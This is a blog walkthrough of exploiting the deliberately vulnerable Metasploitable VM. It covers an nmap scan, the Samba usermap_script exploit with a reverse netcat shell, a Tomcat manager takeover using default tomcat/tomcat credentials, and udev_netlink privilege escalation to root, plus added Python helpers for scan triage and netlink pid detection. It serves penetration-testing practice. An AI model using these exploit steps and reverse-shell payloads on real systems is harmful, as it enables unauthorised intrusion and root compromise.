Saturday, November 9, 2013

Metasploitable - Walkthrough

Metasploitable is another intentionally vulnerable VM built for practising penetration testing, and Metasploit in particular. I could have used manual methods as in the previous cases, but this time I decided to use Metasploit for the exploitation.

I started with NMAP as usual:

root@kali:~# nmap -sS -A

Starting Nmap 6.40 ( ) at 2013-11-09 21:28 CET
Nmap scan report for
Host is up (0.0022s latency).
Not shown: 988 closed ports
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-09T15:28:17-05:00

1   2.16 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds
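The scan above is what drives both methods below, and the useful version strings are not all on the port lines: the 139/445 lines only say "Samba smbd 3.X", while the exact 3.0.20 appears in the smb-os-discovery host script, and the Tomcat version only appears in http-title. As an added example (my own code, not part of the original post or of Metasploit), here is a small parser for nmap's normal output that keeps each open port's version string together with its NSE script lines, then flags the two leads this walkthrough actually followed. The sample input is constructed from the scan above; the CVE number is public and added here, and the LEADS table is deliberately limited to what this page uses.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the lines of the nmap -sS -A output above that matter here.
SAMPLE_NMAP = """\
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|_  System time: 2013-11-09T15:28:17-05:00
"""


@dataclass
class Service:
    port: int
    proto: str
    name: str
    version: str
    scripts: list = field(default_factory=list)   # NSE lines printed under this port


# "21/tcp   open  ftp         ProFTPD 1.3.1" -> port, proto, state, name, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE output lines start with "| " or "|_"
SCRIPT_RE = re.compile(r"^\|[_ ]\s*(.*)$")


def parse_nmap(text):
    """Split nmap's normal output into open services (with their NSE lines) and host script lines."""
    services, host_scripts = [], []
    current, in_host_scripts = None, False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            current = None
            if state == "open":
                current = Service(int(port), proto, name, version.strip())
                services.append(current)
            continue
        if line.startswith("Host script results"):
            in_host_scripts, current = True, None
            continue
        m = SCRIPT_RE.match(line)
        if m:
            if in_host_scripts:
                host_scripts.append(m.group(1).strip())
            elif current is not None:
                current.scripts.append(m.group(1).strip())
    return services, host_scripts


# Only the leads this walkthrough used; the CVE number is public knowledge added here.
LEADS = [
    (r"Samba 3\.0\.20",
     "exploit/multi/samba/usermap_script (CVE-2007-2447, 'username map script' "
     "command injection, Samba 3.0.20 through 3.0.25rc3)"),
    (r"Apache Tomcat/5\.5",
     "try the manager with tomcat/tomcat, then exploit/multi/http/tomcat_mgr_deploy"),
]


def triage(services, host_scripts):
    """Return (port, lead) pairs for every service whose banner or NSE output matches a lead."""
    findings = []
    host_text = "\n".join(host_scripts)
    for svc in services:
        text = svc.version + "\n" + "\n".join(svc.scripts)
        if svc.name == "netbios-ssn":
            # the exact Samba version is only in the smb-os-discovery host script
            text += "\n" + host_text
        for pattern, lead in LEADS:
            if re.search(pattern, text):
                findings.append((svc.port, lead))
    return findings


if __name__ == "__main__":
    for port, lead in triage(*parse_nmap(SAMPLE_NMAP)):
        print("%5d  %s" % (port, lead))
```

Feeding it a real scan is just `parse_nmap(open("scan.nmap").read())` on the file written by `-oN`; the host-script merge is the part worth keeping, since version-based lookups against the bare port line would have missed the Samba version entirely.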

Since everything is so easy with Metasploit, I will show two methods.

Method 1 - Samba username map script (usermap_script)

If we do a Google search for Samba 3.0.20 exploit, we run into the following webpage:

which describes exploit/multi/samba/usermap_script, exactly the MSF module we need. It abuses the "username map script" smb.conf option in Samba 3.0.20 through 3.0.25rc3 (CVE-2007-2447): the username supplied at session setup is passed to a shell unescaped, so shell metacharacters in it run commands as the smbd user. No credentials are needed, but the target must have that (non-default) option set, as Metasploitable does. Configuring and running MSF:

msf exploit(usermap_script) > set RHOST
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST     yes       The target address
   RPORT  139              yes       The target port

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > exploit

[*] Started reverse handler on
[*] Command shell session 1 opened ( -> at 2013-11-09 21:46:52 +0100

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
uid=0(root) gid=0(root)

The python one-liner above just upgrades the raw netcat shell to a proper pty. Since smbd was running as root, the injected command did too, and we are done with this method...

Method 2 - via Tomcat Manager + udev netlink local exploit

There is a Tomcat service on port 8180, and if we browse to it we find the stock Tomcat welcome page with its links to the manager and admin applications. A quick Google search shows that the default Tomcat manager username and password are tomcat/tomcat. I tried them and they really worked. Now we only need the exploit:

Here is the related MSF configuration. The module uploads a WAR containing the payload through the manager's /deploy interface (note the PATH option), requests the JSP inside it to execute the payload, then undeploys the application again:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to
[*] Meterpreter session 2 opened ( -> at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55

As we can see, we are not root yet, only the limited tomcat55 account that Tomcat runs under. Let's put the Meterpreter session into the background (the 'background' command) and look for a local root exploit. The sysinfo output already narrows the field: the kernel is 2.6.24-16-server, i.e. a stock Ubuntu 8.04 install.

For the local root exploit I picked the following (tab completion shows what exploit/linux/local/ offered in this version of MSF):

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec  use exploit/linux/local/udev_netlink   
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > set SESSION 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(udev_netlink) > exploit

[*] Started reverse handler on
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened ( -> at 2013-11-09 22:14:30 +0100

uid=0(root) gid=0(root)

...and we are root. The udev_netlink module exploits CVE-2009-1185: udev before version 141 did not check that a uevent netlink message actually came from the kernel, so an unprivileged local process could send one and have udevd, which runs as root, act on it. Note the WritableDir option: the staged payload and exploit executables are written to /tmp and run from there, so that directory must not be mounted noexec.
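What the "autodetect netlink pid" step above is doing, as an added example in my own code rather than the module's: find udevd in the process list, then look in /proc/net/netlink for a NETLINK_KOBJECT_UEVENT (protocol 15) socket bound with port id udevd_pid-1, the "usually udevd pid-1" heuristic the option description mentions, falling back to any user-space uevent socket subscribed to the uevent multicast group. Both inputs are constructed samples matching the pids the module printed (udev pid 2991, netlink pid 2990); the pid-1 relationship is taken from the module's own option text, not verified here.

```python
NETLINK_KOBJECT_UEVENT = 15   # protocol number of the kernel uevent bus (linux/netlink.h)

# Constructed sample of /proc/net/netlink on a 2.6 kernel.  Columns are
# "sk Eth Pid Groups Rmem Wmem Dump Locks": "Eth" is the netlink protocol,
# "Pid" the port id the socket was bound with, "Groups" a hex bitmask.
SAMPLE_PROC_NET_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
c1a3b400 0   0      00000000 0        0        00000000 2
c1a3b800 15  0      00000000 0        0        00000000 2
c1a3bc00 15  2990   00000001 0        0        00000000 2
c1a3c000 16  0      00000000 0        0        00000000 2
"""

# Constructed (pid, command) pairs as a ps listing would give them, with the
# udevd pid the module reported above.
SAMPLE_PROCESSES = [(1, "init"), (2991, "udevd"), (3012, "jsvc"), (3048, "jsvc")]


def parse_proc_net_netlink(text):
    """Return (protocol, portid, groups) for every socket listed in /proc/net/netlink."""
    sockets = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] == "sk":      # header or short line
            continue
        sockets.append((int(cols[1]), int(cols[2]), int(cols[3], 16)))
    return sockets


def udevd_pids(processes):
    """All pids whose command name is udevd, lowest first."""
    return sorted(pid for pid, comm in processes if comm == "udevd")


def guess_netlink_pid(netlink_text, processes):
    """Pick the port id of udevd's uevent socket, or None if there is no candidate."""
    uevent = [(portid, groups) for proto, portid, groups in parse_proc_net_netlink(netlink_text)
              if proto == NETLINK_KOBJECT_UEVENT and portid != 0]   # port id 0 is the kernel
    if not uevent:
        return None
    candidates = {portid for portid, _ in uevent}
    # The module's heuristic: the socket carries udevd's pid minus one (assumed, per its option text).
    for pid in udevd_pids(processes):
        for guess in (pid - 1, pid):
            if guess in candidates:
                return guess
    # Fallback: a socket that joined the uevent multicast group (bit 0) is the listener we want.
    for portid, groups in uevent:
        if groups & 1:
            return portid
    return uevent[0][0]


if __name__ == "__main__":
    print("udevd pids:", udevd_pids(SAMPLE_PROCESSES))
    print("netlink pid:", guess_netlink_pid(SAMPLE_PROC_NET_NETLINK, SAMPLE_PROCESSES))
```

On a live box the two inputs come from `cat /proc/net/netlink` and a `ps` listing, both readable from the unprivileged tomcat55 shell, which is exactly why the module can fill NetlinkPID in before it needs root.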

There are more methods, but I will leave them to you.
